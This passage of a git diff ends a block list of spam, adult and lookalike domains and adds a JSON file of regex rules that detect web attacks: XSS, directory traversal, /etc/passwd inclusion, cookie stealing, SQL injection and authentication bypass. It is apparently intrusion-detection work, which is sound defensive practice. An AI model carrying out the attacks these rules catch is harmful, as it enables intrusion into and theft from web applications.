+xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai
+xn-----7kceclhb4abre1b4a0ccl2fxch1a.xn--p1ai
+xn-----8kcatubaocd1bneepefojs1h2e.xn--p1ai
+xn----7sbaaabaei0cc8aj5bj0bncejx.xn--p1ai
+xn----7sbahjd3btneuw1joc.xn--p1ai
+xn----7sbaphztdjeboffeiof6c.xn--p1ai
+xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai
+xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai
+xn----7sbho2agebbhlivy.xn--p1ai
+xn----7sbifcamovvfggw9d.xn--p1ai
+xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks
+xn----8sbdbjgb1ap7a9c4czbh.xn--p1acf
+xn----8sbhefaln6acifdaon5c6f4axh.xn--p1ai
+xn----8sblgmbj1a1bk8l.xn----161-4vemb6cjl7anbaea3afninj.xn--p1ai
+xn----9sbebi2bvzr7h.xn--p1ai
+xn----9sbubg3ambdfl1j.xn--p1ai
+xn----btbdvdh4aafrfciljm6k.xn--p1ai
+xn----ctbbcjd3dbsehgi.xn--p1ai
+xn----ctbigni3aj4h.xn--p1ai
+xn----dtbndd4ae7eub.top
+xn----itbeirbjbi7bc6bh2d.xn--p1ai
+xn----itbkqkfiq.xn--p1ai
+xn--1-8sbcpb0bdm8k6a.xn--p1ai
+xn--24-glceagatoq7c2a6ioc.xn--p1ai
+xn--80aaafbn2bc2ahdfrfkln6l.xn--p1ai
+xn--80aaagvmjabrs1aoc9luc.xn--p1ai
+xn--80aaajbdbddwj2alwjieei2afr3v.xn--p1ai
+xn--80aaaks3bbhabgbigamdr2h.xn--p1ai
+xn--80aafb2a.xn--p1ai
+xn--80aagddcgkbcqbad7amllnejg6dya.xn--p1ai
+xn--80aanaardaperhcem4a6i.com
+xn--80ab4aa2g.xn--p1ai
+xn--80abgj3a5acid6ghs.top
+xn--80adaggc5bdhlfamsfdij4p7b.xn--p1ai
+xn--80aeahghtf8ac5i.xn--p1ai
+xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai
+xn--80ahdheogk5l.xn--p1ai
+xn--80ahvj9e.xn--p1ai
+xn--80aikhbrhr.net
+xn--80ajbshivpvn2i.xn--p1ai
+xn--80ajjbdhgmudixfjc8c5a9df8b.xn--p1ai
+xn--80ak6aa92e.com
+xn--80aodinpgi.xn--p1ai
+xn--80atua3d.xn--p1ai
+xn--90acenikpebbdd4f6d.xn--p1ai
+xn--b1adccaf1bzj.xn--p1ai
+xn--b1addnj3cah.xn--p1ai
+xn--b1ag5cfn.xn--p1ai
+xn--b1agm2d.net
+xn--c1acygb.xn--p1ai
+xn--d1abj0abs9d.in.ua
+xn--d1acah0c.xn--p1ai
+xn--d1aifoe0a9a.top
+xn--e1afanlbnfckd7c3d.xn--p1ai
+xn--e1aggki3c.xn--80adxhks
+xn--h1aakne2ba.xn--p1ai
+xn--h1ahbi.com.ua
+xn--hxazdsfy.blogspot.com
+xn--l1aengat.xn--p1ai
+xn--lifehacer-1rb.com
+xn--oogle-wmc.com
+xn--q1a.xn--b1aube0e.xn--c1acygb.xn--p1ai
+xnxx-n.com
+xnxx699.com
+xnxxandxvideos.com
+xolodremont.ru
+xportvusbdriver8i.snack.ws
+xpresscare.ru
+xrus.org
+xsfetish.org
+xsion.net
+xtraffic.plus
+xtrafficplus.com
+xtremeeagles.net
+xtube.com
+xtubeporno.net
+xuki.us
+xvideosbay.com
+xvideosporn.biz
+xvideospornoru.com
+xwatt.ru
+xxart.ru
+xxlargepop.com
+xxx-cam.webcam
+xxx-treker.ru
+xxxasianporn.net
+xxxdatinglocal.us
+xxxguitars.com
+xxxhdvideo.site
+xxxkaz.org
+xxxmania.top
+xxxnatelefon.ru
+xxxrus.org
+xxxsiterips.xyz
+xxxtube69.com
+xxxtubesafari.com
+xz618.com
+xzlive.com
+y8games-free.com
+yaaknaa.info
+yachts-cruise.info
+yaderenergy.ru
+yadro.ru
+yaminecraft.ru
+yaoguangdj.com
+yatrk.xyz
+yeartwit.com
+yebocasino.co.za
+yebocasino.com
+yellocloud.be
+yellowads.men
+yellowfootprints.com
+yellowproxy.net
+yellowstonesafaritours.com
+yellowstonevisitortours.com
+yes-com.com
+yginekologa.com
+yhit.press
+ynymnwbm.bloger.index.hr
+yogamatsexpert.com
+yoluxuryevents.com
+yoopsie.com
+yopoint.in
+yoshkarola.zrus.org
+yottos.com
+you-shall-not-pass.is74.ru
+youandcredit.ru
+youbloodyripper.com
+youbrainboost.asia
+youdao.com
+youdesigner.kz
+yougame.biz
+yougetsignal.com
+youghbould.wordpress.com
+yougotanewdomain.com
+youjizz.com
+youjizz.vc
+youporn-forum.ga
+youporn-ru.com
+your-bearings.com
+youradexchange.com
+yourads.website
+youradulthosting.com
+youraticles.pl
+yourdesires.ru
+youresponsive.com
+yourmovies.pl
+yourothersite.com
+yourporn.com
+yourporngay.com
+yoursearch.me
+yourserverisdown.com
+yoursite.com
+yourtemplatefinder.com
+yousense.info
+youthreaders.com
+youtoner.it
+youtube-downloader.savetubevideo.com
+youtubedownload.org
+youtubologia.it
+youtuhe.com
+ypmuseum.ru
+ytmnd.com
+yuarra.pluto.ro
+yubikk.info
+yugk.net
+yugo-star.ru
+yun56.co
+yunque.pluto.ro
+yur-p.ru
+yurgorod.ru
+yuweng.info
+z-master.ru
+za-fun-offer.com
+za-music.mymobiplanet.com
+zaapplesales.blogspot.com
+zacreditom.ru
+zagadki.in.ua
+zahvat.ru
+zaidia.xhost.ro
+zaim-pod-zalog-krasnodar.ru
+zaimhelp.ru
+zaimite.ru
+zajm-pod-zalog-nedvizhimosti.ru
+zajm-zalog-krasnodar.ru
+zakazfutbolki.com
+zakazvzloma.com
+zakon-ob-obrazovanii.ru
+zakonobosago.ru
+zaloadi.ru
+zaloro.com
+zambini.ru
+zaobao.com.sg
+zapatosenventa.info
+zapiszto.pl
+zarabiaj-dzis.pl
+zarabotat-na-sajte.ru
+zarabotok--doma.ru
+zarajbuilders.com
+zarenica.net
+zarepta.com
+zastenchivosti.net
+zastroyka.org
+zatjmuzu.info
+zawyna.ua
+zazagames.org
+zdesformula.ru
+zdesoboi.com
+zebradudka.com
+zebramart.ru
+zed21.net
+zeg-distribution.com
+zeikopay.com
+zeleznobeton.ru
+zero1.it
+zerocash.msk.ru
+zeroredirect.com
+zeroredirect1.com
+zeroredirect10.com
+zeroredirect11.com
+zeroredirect12.com
+zeroredirect2.com
+zeroredirect5.com
+zeroredirect6.com
+zeroredirect7.com
+zeroredirect8.com
+zeroredirect9.com
+zetgie.com.pl
+zetmaster.ru
+zhacker.net
+zhongwenlink.com
+zhorapankratov7.blogspot.com
+zhuravlev.info
+zigarettenonl.canalblog.com
+zigarettenonlinekaufen.tumblr.com
+zigarettenonlinekaufen1.bloog.pl
+zigarettenonlinekaufen1.blox.pl
+zigarettenonlinekaufen2.bloog.pl
+zigarettenonlinekaufen2.drupalgardens.com
+zigzog.ru
+zionstar.net
+zirondelli.it
+zixizop.net.ru
+zkjovpdgxivg.ga
+zlatnajesen.com
+zmoda.hostreo.com
+znakom.sibtest.ru
+znakomstva-moskva77.ru
+znakomstva-piter78.ru
+znakomstvaonlain.ru
+znaniyapolza.ru
+znaturaloriginal.com
+zocaparj.kz
+zog.link
+zojirushi-products.ru
+zolotoy-lis.ru
+zona-aqua.ru
+zone-kev717.info
+zoodrawings.com
+zoogdiesney.com
+zoogdinsney.com
+zoogdisany.com
+zooggames.com
+zoolubimets.ru
+zoominfo.com
+zoomovies.org
+zoompegs.com
+zoosexart.com
+zootoplist.com
+zootravel.com
+zophim.me
+zrelaya.pw
+zreloeporno.tv
+zrizvtrnpale.tk
+zrus.org
+zryydi.com
+zs2vm.top
+zscaler.net
+zscalerone.net
+zscalertwo.net
+zskdla.site
+zverokruh-shop.cz
+zvetki.ru
+zvezdagedon.ru
+zvooq.eu
+zvuker.net
+zx6.ru
+zygophyceous.womanstars.site
+zynax.ua
+zytpirwai.net
+zzbroya.com.ua
+zzlgxh.com
\ No newline at end of file
diff --git a/db/common-web-attacks.json b/db/common-web-attacks.json
new file mode 100644
index 0000000..70cad69
--- /dev/null
+++ b/db/common-web-attacks.json
@@ -0,0 +1 @@
+{"filters":[{"id":1,"rule":"(?:\"[^\"]*[^-]?>)|(?:[^\\w\\s]\\s*\\/>)|(?:>\")","description":"finds html breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":2,"rule":"(?:\"+.*[<=]\\s*\"[^\"]+\")|(?:\"\\s*\\w+\\s*=)|(?:>\\w=\\/)|(?:#.+\\)[\"\\s]*>)|(?:\"\\s*(?:src|style|on\\w+)\\s*=\\s*\")|(?:[^\"]?\"[,;\\s]+\\w*[\\[\\(])","description":"finds attribute breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":3,"rule":"(?:^>[\\w\\s]*<\\/?\\w{2,}>)","description":"finds unquoted attribute breaking injections","tags":["xss","csrf"],"impact":2},{"id":4,"rule":"(?:[+\\/]\\s*name[\\W\\d]*[)+])|(?:;\\W*url\\s*=)|(?:[^\\w\\s\\/?:>]\\s*(?:location|referrer|name)\\s*[^\\/\\w\\s-])","description":"Detects url-, name-, JSON, and referrer-contained payload attacks","tags":["xss","csrf"],"impact":5},{"id":5,"rule":"(?:\\W\\s*hash\\s*[^\\w\\s-])|(?:\\w+=\\W*[^,]*,[^\\s(]\\s*\\()|(?:\\?\"[^\\s\"]\":)|(?:(?<!\\/)__[a-z]+__)|(?:(?:^|[\\s)\\]\\}])(?:s|g)etter\\s*=)","description":"Detects hash-contained xss payload attacks, setter usage and property overloading","tags":["xss","csrf"],"impact":5},{"id":6,"rule":"(?:with\\s*\\(\\s*.+\\s*\\)\\s*\\w+\\s*\\()|(?:(?:do|while|for)\\s*\\([^)]*\\)\\s*\\{)|(?:\\/[\\w\\s]*\\[\\W*\\w)","description":"Detects self contained xss via with(), common loops and regex to string conversion","tags":["xss","csrf"],"impact":5},{"id":7,"rule":"(?:[=(].+\\?.+:)|(?:with\\([^)]*\\)\\))|(?:\\.\\s*source\\W)","description":"Detects JavaScript with(), ternary operators and XML predicate attacks","tags":["xss","csrf"],"impact":5},{"id":8,"rule":"(?:\\/\\w*\\s*\\)\\s*\\()|(?:\\([\\w\\s]+\\([\\w\\s]+\\)[\\w\\s]+\\))|(?:(?<!(?:mozilla\\/\\d\\.\\d\\s))\\([^)[]+\\[[^\\]]+\\][^)]*\\))|(?:[^\\s!][{([][^({[]+[{([][^}\\])]+[}\\])][\\s+\",\\d]*[}\\])])|(?:\"\\)?\\]\\W*\\[)|(?:=\\s*[^\\s:;]+\\s*[{([][^}\\])]+[}\\])];)","description":"Detects self-executing JavaScript functions","tags":["xss","csrf"],"impact":5},{"id":9,"rule":"(?i)(?:\\\\u(?:\\{(0{1,})?[a-f0-9]{2}\\}|00[a-f0-9]{2}))|(?:\\\\x0*[a-f0-9]{2})|(?:\\\\\\d{2,3})","description":"Detects the IE octal, hex and unicode entities","tags":["xss","csrf"],"impact":2},{"id":10,"rule":"(?:(?:\\/|\\\\)?\\.+(\\/|\\\\)(?:\\.+)?)|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*\\/[\\w*-]+\\/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:\\/(?:%2e){2})","description":"Detects basic directory traversal","tags":["dt","id","lfi"],"impact":5},{"id":11,"rule":"(?:%c0%ae\\/)|(?:(?:\\/|\\\\)(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:\\/|\\\\))|(?:(?:\\/|\\\\)inetpub|localstart\\.asp|boot\\.ini)","description":"Detects specific directory and path traversal","tags":["dt","id","lfi"],"impact":5},{"id":12,"rule":"(?:etc\\/\\W*passwd)","description":"Detects etc/passwd inclusion attempts","tags":["dt","id","lfi"],"impact":5},{"id":13,"rule":"(?:%u(?:ff|00|e\\d)\\w\\w)|(?:(?:%(?:e\\w|c[^3\\W]|))(?:%\\w\\w)(?:%\\w\\w)?)","description":"Detects halfwidth/fullwidth encoded unicode HTML breaking attempts","tags":["xss","csrf"],"impact":3},{"id":14,"rule":"(?:#@~\\^\\w+)|(?:\\w+script:|@?import\\s*\\(?|;base64|base64,)|(?:\\w\\s*\\([\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+\\))","description":"Detects possible includes, VBSCript/JScript encoded and packed functions","tags":["xss","csrf","id","rfe"],"impact":5},{"id":15,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:create(?:element|attribute|textnode)|[a-z]+events?|setattribute|getelement\\w+|appendchild|createrange|createcontextualfragment|removenode|parentnode|decodeuricomponent|\\wettimeout|(?:ms)?setimmediate|option|useragent)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.+\\-]))","description":"Detects JavaScript DOM/miscellaneous properties and methods","tags":["xss","csrf","id","rfe"],"impact":6},{"id":16,"rule":"([^*\\s\\w,.\\/?+-]\\s*)?(?<![a-mo-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:alert|inputbox|showmod(?:al|eless)dialog|showhelp|infinity|isnan|isnull|iterator|msgbox|executeglobal|expression|prompt|write(?:ln)?|confirm|dialog|urn|(?:un)?eval|exec|execscript|tostring|status|execute|window|unescape|navigate|jquery|getscript|extend|prototype)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.:\\/+\\-]))","description":"Detects possible includes and typical script methods","tags":["xss","csrf","id","rfe"],"impact":5},{"id":17,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:hash|name|href|navigateandfind|source|pathname|close|constructor|port|protocol|assign|replace|back|forward|document|ownerdocument|window|top|this|self|parent|frames|_?content|date|cookie|innerhtml|innertext|csstext+?|outerhtml|print|moveby|resizeto|createstylesheet|stylesheets)(?(1)[^\\w%\"]|(?:\\s*[^@\\/\\s\\w%.+\\-])['\"`])","description":"Detects JavaScript object properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":18,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:join|pop|push|reverse|reduce|concat|map|shift|sp?lice|sort|unshift)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript array properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":19,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:set|atob|btoa|charat|charcodeat|charset|concat|crypto|frames|fromcharcode|indexof|lastindexof|match|navigator|toolbar|menubar|replace|regexp|slice|split|substr|substring|escape|\\w+codeuri\\w*)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript string properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":20,"rule":"(?:\\)\\s*\\[)|([^*\":\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z_@\\|])(\\s*return\\s*)?(?:globalstorage|sessionstorage|postmessage|callee|constructor|content|domain|prototype|try|catch|top|call|apply|url|function|object|array|string|math|if|for\\s*(?:each)?|elseif|case|switch|regex|boolean|location|(?:ms)?setimmediate|settimeout|setinterval|void|setexpression|namespace|while)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\".+\\-\\/]))","description":"Detects JavaScript language constructs","tags":["xss","csrf","id","rfe"],"impact":4},{"id":21,"rule":"(?:,\\s*(?:alert|showmodaldialog|eval)\\s*,)|(?::\\s*eval\\s*[^\\s])|([^:\\s\\w,.\\/?+-]\\s*)?(?<![a-z\\/_@])(\\s*return\\s*)?(?:(?:document\\s*\\.)?(?:.+\\/)?(?:alert|eval|msgbox|showmod(?:al|eless)dialog|showhelp|prompt|write(?:ln)?|confirm|dialog|open))\\s*(?:[^.a-z\\s\\-]|(?:\\s*[^\\s\\w,.@\\/+-]))|(?:java[\\s\\/]*\\.[\\s\\/]*lang)|(?:\\w\\s*=\\s*new\\s+\\w+)|(?:&\\s*\\w+\\s*\\)[^,])|(?:\\+[\\W\\d]*new\\s+\\w+[\\W\\d]*\\+)|(?:document\\.\\w)","description":"Detects very basic XSS probings","tags":["xss","csrf","id","rfe"],"impact":3},{"id":22,"rule":"(?:=\\s*(?:top|this|window|content|self|frames|_content))|(?:\\/\\s*[gimx]*\\s*[)}])|(?:[^\\s]\\s*=\\s*script)|(?:\\.\\s*constructor)|(?:default\\s+xml\\s+namespace\\s*=)|(?:\\/\\s*\\+[^+]+\\s*\\+\\s*\\/)","description":"Detects advanced XSS probings via Script(), RexExp, constructors and XML namespaces","tags":["xss","csrf","id","rfe"],"impact":5},{"id":23,"rule":"(?:\\.\\s*\\w+\\W*=)|(?:\\W\\s*(?:location|document)\\s*\\W[^({[;]+[({[;])|(?:\\(\\w+\\?[:\\w]+\\))|(?:\\w{2,}\\s*=\\s*\\d+[^&\\w]\\w+)|(?:\\]\\s*\\(\\s*\\w+)","description":"Detects JavaScript location/document property access and window access obfuscation","tags":["xss","csrf"],"impact":5},{"id":24,"rule":"(?:[\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\"])|(?:\\/[\\w\\s]+\\/\\.)|(?:=\\s*\\/\\w+\\/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])","description":"Detects basic obfuscated JavaScript script injections","tags":["xss","csrf"],"impact":5},{"id":25,"rule":"(?:=\\s*[$\\w]\\s*[\\(\\[])|(?:\\(\\s*(?:this|top|window|self|parent|_?content)\\s*\\))|(?:src\\s*=s*(?:\\w+:|\\/\\/))|(?:\\w+\\[(\"\\w+\"|\\w+\\|\\|))|(?:[\\d\\W]\\|\\|[\\d\\W]|\\W=\\w+,)|(?:\\/\\s*\\+\\s*[a-z\"])|(?:=\\s*\\$[^([]*\\()|(?:=\\s*\\(\\s*\")","description":"Detects obfuscated JavaScript script injections","tags":["xss","csrf"],"impact":5},{"id":26,"rule":"(?:[^:\\s\\w]+\\s*[^\\w\\/](href|protocol|host|hostname|pathname|hash|port|cookie)[^\\w])","description":"Detects JavaScript cookie stealing and redirection attempts","tags":["xss","csrf"],"impact":4},{"id":27,"rule":"(?:(?:vbs|vbscript|data):.*[,+])|(?:\\w+\\s*=\\W*(?!https?)\\w+:)|(jar:\\w+:)|(=\\s*\"?\\s*vbs(?:ript)?:)|(language\\s*=\\s?\"?\\s*vbs(?:ript)?)|on\\w+\\s*=\\*\\w+\\-\"?","description":"Detects data: URL injections, VBS injections and common URI schemes","tags":["xss","rfe"],"impact":5},{"id":28,"rule":"(?:firefoxurl:\\w+\\|)|(?:(?:file|res|telnet|nntp|news|mailto|chrome)\\s*:\\s*[%&#xu\\/]+)|(wyciwyg|firefoxurl\\s*:\\s*\\/\\s*\\/)","description":"Detects IE firefoxurl injections, cache poisoning attempts and local file inclusion/execution","tags":["xss","rfe","lfi","csrf"],"impact":5},{"id":29,"rule":"(?:binding\\s?=|moz-binding|behavior\\s?=)|(?:[\\s\\/]style\\s*=\\s*[-\\\\])","description":"Detects bindings and behavior injections","tags":["xss","csrf","rfe"],"impact":4},{"id":30,"rule":"(?:=\\s*\\w+\\s*\\+\\s*\")|(?:\\+=\\s*\\(\\s\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[s*\\])|(?:\"\\s*\\+\\s*\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\"\\s*[&|]+\\s*\")|(?:\\/\\s*\\?\\s*\")|(?:\\/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:]\\s*\\[\\W*\\w)|(?:[^\\s]\\s*=\\s*\\/)","description":"Detects common XSS concatenation patterns 1/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":31,"rule":"(?:=\\s*\\d*\\.\\d*\\?\\d*\\.\\d*)|(?:[|&]{2,}\\s*\")|(?:!\\d+\\.\\d*\\?\")|(?:\\/:[\\w.]+,)|(?:=[\\d\\W\\s]*\\[[^]]+\\])|(?:\\?\\w+:\\w+)","description":"Detects common XSS concatenation patterns 2/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":32,"rule":"(?:[^\\w\\s=]on(?!g\\&gt;)\\w+[^=_+-]*=[^$]+(?:\\W|\\&gt;)?)","description":"Detects possible event handlers","tags":["xss","csrf"],"impact":4},{"id":33,"rule":"(?:\\<\\w*:?\\s(?:[^\\>]*)t(?!rong))|(?:\\<scri)|(<\\w+:\\w+)","description":"Detects obfuscated script tags and XML wrapped HTML","tags":["xss"],"impact":4},{"id":34,"rule":"(?:\\<\\/\\w+\\s\\w+)|(?:@(?:cc_on|set)[\\s@,\"=])","description":"Detects attributes in closing tags and conditional compilation tokens","tags":["xss","csrf"],"impact":4},{"id":35,"rule":"(?:--[^\\n]*$)|(?:\\<!-|-->)|(?:[^*]\\/\\*|\\*\\/[^*])|(?:(?:[\\W\\d]#|--|{)$)|(?:\\/{3,}.*$)|(?:<!\\[\\W)|(?:\\]!>)","description":"Detects common comment types","tags":["xss","csrf","id"],"impact":3},{"id":37,"rule":"(?:\\<base\\s+)|(?:<!(?:element|entity|\\[CDATA))","description":"Detects base href injections and XML entity injections","tags":["xss","csrf","id"],"impact":5},{"id":38,"rule":"(?:\\<[\\/]?(?:[i]?frame|applet|isindex|marquee|keygen|script|audio|video|input|button|textarea|style|base|body|meta|link|object|embed|param|plaintext|xm\\w+|image|im(?:g|port)))","description":"Detects possibly malicious html elements including some attributes","tags":["xss","csrf","id","rfe","lfi"],"impact":4},{"id":39,"rule":"(?:\\\\x[01fe][\\db-ce-f])|(?:%[01fe][\\db-ce-f])|(?:&#[01fe][\\db-ce-f])|(?:\\\\[01fe][\\db-ce-f])|(?:&#x[01fe][\\db-ce-f])","description":"Detects nullbytes and other dangerous characters","tags":["id","rfe","xss"],"impact":5},{"id":40,"rule":"(?:\\)\\s*when\\s*\\d+\\s*then)|(?:\"\\s*(?:#|--|{))|(?:\\/\\*!\\s?\\d+)|(?:ch(?:a)?r\\s*\\(\\s*\\d)|(?:(?:(n?and|x?or|not)\\s+|\\|\\||\\&\\&)\\s*\\w+\\()","description":"Detects MySQL comments, conditions and ch(a)r injections","tags":["sqli","id","lfi"],"impact":6},{"id":41,"rule":"(?:[\\s()]case\\s*\\()|(?:\\)\\s*like\\s*\\()|(?:having\\s*[^\\s]+\\s*[^\\w\\s])|(?:if\\s?\\([\\d\\w]\\s*[=<>~])","description":"Detects conditional SQL injection attempts","tags":["sqli","id","lfi"],"impact":6},{"id":42,"rule":"(?:\"\\s*or\\s*\"?\\d)|(?:\\\\x(?:23|27|3d))|(?:^.?\"$)|(?:(?:^[\"\\\\]*(?:[\\d\"]+|[^\"]+\"))+\\s*(?:n?and|x?or|not|\\|\\||\\&\\&)\\s*[\\w\"[+&!@(),.-])|(?:[^\\w\\s]\\w+\\s*[|-]\\s*\"\\s*\\w)|(?:@\\w+\\s+(and|or)\\s*[\"\\d]+)|(?:@[\\w-]+\\s(and|or)\\s*[^\\w\\s])|(?:[^\\w\\s:]\\s*\\d\\W+[^\\w\\s]\\s*\".)|(?:\\Winformation_schema|table_name\\W)","description":"Detects classic SQL injection probings 1/2","tags":["sqli","id","lfi"],"impact":6},{"id":43,"rule":"(?:\"\\s*\\*.+(?:or|id)\\W*\"\\d)|(?:\\^\")|(?:^[\\w\\s\"-]+(?<=and\\s)(?<=or\\s)(?<=xor\\s)(?<=nand\\s)(?<=not\\s)(?<=\\|\\|)(?<=\\&\\&)\\w+\\()|(?:\"[\\s\\d]*[^\\w\\s]+\\W*\\d\\W*.*[\"\\d])|(?:\"\\s*[^\\w\\s?]+\\s*[^\\w\\s]+\\s*\")|(?:\"\\s*[^\\w\\s]+\\s*[\\W\\d].*(?:#|--))|(?:\".*\\*\\s*\\d)|(?:\"\\s*or\\s[^\\d]+[\\w-]+.*\\d)|(?:[()*<>%+-][\\w-]+[^\\w\\s]+\"[^,])","description":"Detects classic SQL injection probings 2/2","tags":["sqli","id","lfi"],"impact":6},{"id":44,"rule":"(?:\\d\"\\s+\"\\s+\\d)|(?:^admin\\s*\"|(\\/\\*)+\"+\\s?(?:--|#|\\/\\*|{)?)|(?:\"\\s*or[\\w\\s-]+\\s*[+<>=(),-]\\s*[\\d\"])|(?:\"\\s*[^\\w\\s]?=\\s*\")|(?:\"\\W*[+=]+\\W*\")|(?:\"\\s*[!=|][\\d\\s!=+-]+.*[\"(].*$)|(?:\"\\s*[!=|][\\d\\s!=]+.*\\d+$)|(?:\"\\s*like\\W+[\\w\"(])|(?:\\sis\\s*0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:\"[<>~]+\")","description":"Detects basic SQL authentication bypass attempts 1/3","tags":["sqli","id","lfi"],"impact":7},{"id":45,"rule":"(?:union\\s*(?:all|distinct|[(!@]*)\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()","description":"Detects basic SQL authentication bypass attempts 2/3","tags":["sqli","id","lfi"],"impact":7},{"id":46,"rule":"(?:in\\s*\\(+\\s*select)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w+]+(?:regexp\\s*\\(|sounds\\s+like\\s*\"|[=\\d]+x))|(\"\\s*\\d\\s*(?:--|#))|(?:\"[%&<>^=]+\\d\\s*(=|or))|(?:\"\\W+[\\w+-]+\\s*=\\s*\\d\\W+\")|(?:\"\\s*is\\s*\\d.+\"?\\w)|(?:\"\\|?[\\w-]{3,}[^\\w\\s.,]+\")|(?:\"\\s*is\\s*[\\d.]+\\s*\\W.*\")","description":"Detects basic SQL authentication bypass attempts 3/3","tags":["sqli","id","lfi"],"impact":7},{"id":47,"rule":"(?:[\\d\\W]\\s+as\\s*[\"\\w]+\\s*from)|(?:^[\\W\\d]+\\s*(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s+(?:(?:group_)concat|char|load_file)\\s?\\(?)|(?:end\\s*\\);)|(\"\\s+regexp\\W)|(?:[\\s(]load_file\\s*\\()","description":"Detects concatenated basic SQL injection and SQLLFI attempts","tags":["sqli","id","lfi"],"impact":5},{"id":48,"rule":"(?:@.+=\\s*\\(\\s*select)|(?:\\d+\\s*or\\s*\\d+\\s*[\\-+])|(?:\\/\\w+;?\\s+(?:having|and|or|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*(?:drop|alter))|(?:(?:;|#|--)\\s*(?:update|insert)\\s*\\w{2,})|(?:[^\\w]SET\\s*@\\w+)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*[!=+]+[\\s\\d]*[\"=()])","description":"Detects chained SQL injection attempts 1/2","tags":["sqli","id"],"impact":6},{"id":49,"rule":"(?:\"\\s+and\\s*=\\W)|(?:\\(\\s*select\\s*\\w+\\s*\\()|(?:\\*\\/from)|(?:\\+\\s*\\d+\\s*\\+\\s*@)|(?:\\w\"\\s*(?:[-+=|@]+\\s*)+[\\d(])|(?:coalesce\\s*\\(|@@\\w+\\s*[^\\w\\s])|(?:\\W!+\"\\w)|(?:\";\\s*(?:if|while|begin))|(?:\"[\\s\\d]+=\\s*\\d)|(?:order\\s+by\\s+if\\w*\\s*\\()|(?:[\\s(]+case\\d*\\W.+[tw]hen[\\s(])","description":"Detects chained SQL injection attempts 2/2","tags":["sqli","id"],"impact":6},{"id":50,"rule":"(?:(select|;)\\s+(?:benchmark|if|sleep)\\s*?\\(\\s*\\(?\\s*\\w+)","description":"Detects SQL benchmark and sleep injection attempts including conditional queries","tags":["sqli","id"],"impact":4},{"id":51,"rule":"(?:create\\s+function\\s+\\w+\\s+returns)|(?:;\\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*[\\[(]?\\w{2,})","description":"Detects MySQL UDF injection and other data/structure manipulation attempts","tags":["sqli","id"],"impact":6},{"id":52,"rule":"(?:alter\\s*\\w+.*character\\s+set\\s+\\w+)|(\";\\s*waitfor\\s+time\\s+\")|(?:\";.*:\\s*goto)","description":"Detects MySQL charset switch and MSSQL DoS attempts","tags":["sqli","id"],"impact":6},{"id":53,"rule":"(?:procedure\\s+analyse\\s*\\()|(?:;\\s*(declare|open)\\s+[\\w-]+)|(?:create\\s+(procedure|function)\\s*\\w+\\s*\\(\\s*\\)\\s*-)|(?:declare[^\\w]+[@#]\\s*\\w+)|(exec\\s*\\(\\s*@)","description":"Detects MySQL and PostgreSQL stored procedure/function injections","tags":["sqli","id"],"impact":7},{"id":54,"rule":"(?:select\\s*pg_sleep)|(?:waitfor\\s*delay\\s?\"+\\s?\\d)|(?:;\\s*shutdown\\s*(?:;|--|#|\\/\\*|{))","description":"Detects 